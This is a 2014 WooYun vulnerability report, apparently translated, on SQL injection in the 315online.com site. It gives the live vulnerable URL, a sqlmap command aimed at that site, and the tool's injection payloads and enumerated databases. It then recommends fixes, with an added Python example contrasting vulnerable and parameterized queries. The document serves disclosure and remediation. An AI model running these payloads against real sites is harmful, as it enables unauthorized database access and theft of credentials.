
Vulnerability summary

Defect ID: wooyun-2014-079181

Title: SQL injection vulnerability on the China Quality Wanlixing (中国质量万里行) official website

Vendor: China Quality Wanlixing Magazine (中国质量万里行杂志社)

Author: gently

Submitted: 2014-10-13 15:58

Fix deadline: 2014-11-27 16:00

Published: 2014-11-27 16:00

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-11-27: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The China Quality Wanlixing official website has a SQL injection vulnerability; the back-end admin panel can be located and the administrator password can be dumped.

Detailed description:

Page URL:
http://www.315online.com/plus/ts_view.php?aid=10
Append a single quote to the parameter:
http://www.315online.com/plus/ts_view.php?aid=10%27
The page throws a MySQL error, which shows the raw value is spliced straight into the query:

MySQL Query : select ts.* from `dede_ts_info` ts where ts.id=10\' 
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
MySQL Errno : 1064
Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Need Help?


Run sqlmap against it:

python sqlmap.py -u 'http://www.315online.com/plus/ts_view.php?aid=111111' --user-agent='Mozilla/5.0' --dbs


The database names are listed without trouble:

available databases [3]:
[*] information_schema
[*] phpcms
[*] test


I didn't go any further; they are friends from the media, after all, so I stopped there. This was purely a test.

Proof of vulnerability:

GET parameter 'aid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 442 HTTP(s) requests:
---
Place: GET
Parameter: aid
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: aid=111111 AND (SELECT 5824 FROM(SELECT COUNT(*),CONCAT(0x7163726171,(SELECT (CASE WHEN (5824=5824) THEN 1 ELSE 0 END)),0x71686c7971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: aid=-9164 OR 7205=SLEEP(5)
---
[13:43:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.19
back-end DBMS: MySQL 5.0
[13:43:03] [INFO] fetching database names
[13:43:03] [INFO] the SQL query used returns 3 entries
[13:43:04] [INFO] retrieved: information_schema
[13:43:04] [INFO] retrieved: phpcms
[13:43:04] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] phpcms
[*] test

Fix:

Filter input parameters. aid is a numeric record ID, so cast it to an integer (or reject any value that is not all digits) before it reaches the query, and pass it as a bound parameter of a prepared statement instead of concatenating it into the SQL string. Also stop showing raw MySQL errors to visitors: the verbose error page above is what let a single quote confirm the injection and what the error-based sqlmap payload relies on.
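The following is an added example, not code from the report or from the site's CMS. It reproduces the pattern behind the leaked error (the raw GET value spliced into a "where ts.id=" clause) next to a hardened lookup, using sqlite3 as a stand-in for MySQL; the table name dede_ts_info is taken from the error message, and its column layout and the sample rows are constructed for the demonstration.

```python
"""Vulnerable vs. hardened lookup for an integer id such as ts_view.php?aid=.

Added example (not the page's or the CMS's code). sqlite3 stands in for
MySQL; the table dede_ts_info is the name from the leaked error message,
its columns and rows are constructed here.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three rows in a table mimicking dede_ts_info."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dede_ts_info (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO dede_ts_info (id, title) VALUES (?, ?)",
        [(9, "complaint nine"), (10, "complaint ten"), (11, "complaint eleven")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, aid: str) -> list:
    """The pattern behind the report's error page: the raw GET value is
    concatenated into the SQL text, so a stray quote breaks the syntax and
    an injected OR clause changes which rows come back."""
    sql = f"select ts.* from dede_ts_info ts where ts.id={aid}"
    return conn.execute(sql).fetchall()


def probe(conn: sqlite3.Connection, aid: str) -> tuple:
    """What the single-quote test on the page observes: ('ok', rows) or
    ('error', db message) from the vulnerable path."""
    try:
        return ("ok", vulnerable_lookup(conn, aid))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def is_valid_aid(aid: str) -> bool:
    """Whitelist check: an id is a short run of decimal digits, nothing else.
    Rejects quotes, spaces, operators and function calls outright."""
    return re.fullmatch(r"[0-9]{1,10}", aid) is not None


def hardened_lookup(conn: sqlite3.Connection, aid: str) -> list:
    """Validate first, then bind the value as a parameter. The binding alone
    would stop injection; the validation additionally rejects junk before any
    database round trip and gives a clean 4xx-style failure instead of a
    DB error leaking to the visitor."""
    if not is_valid_aid(aid):
        raise ValueError("aid must be a decimal integer")
    sql = "select ts.* from dede_ts_info ts where ts.id=?"
    return conn.execute(sql, (int(aid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for value in ("10", "10'", "10 OR 1=1"):
        print(repr(value), "->", probe(db, value))
    print("hardened 10 ->", hardened_lookup(db, "10"))
    for value in ("10'", "10 OR 1=1"):
        print("hardened", repr(value), "-> rejected:", not is_valid_aid(value))
```

The three probes mirror the report in order: a normal id returns one row, the trailing quote produces a syntax error (the MySQL Errno 1064 page above), and an injected OR returns every row, which is the same primitive sqlmap automates with its error-based and time-based payloads. The hardened path never lets the second and third inputs near the database.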

Copyright notice: please credit the source when reposting: gently@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined to respond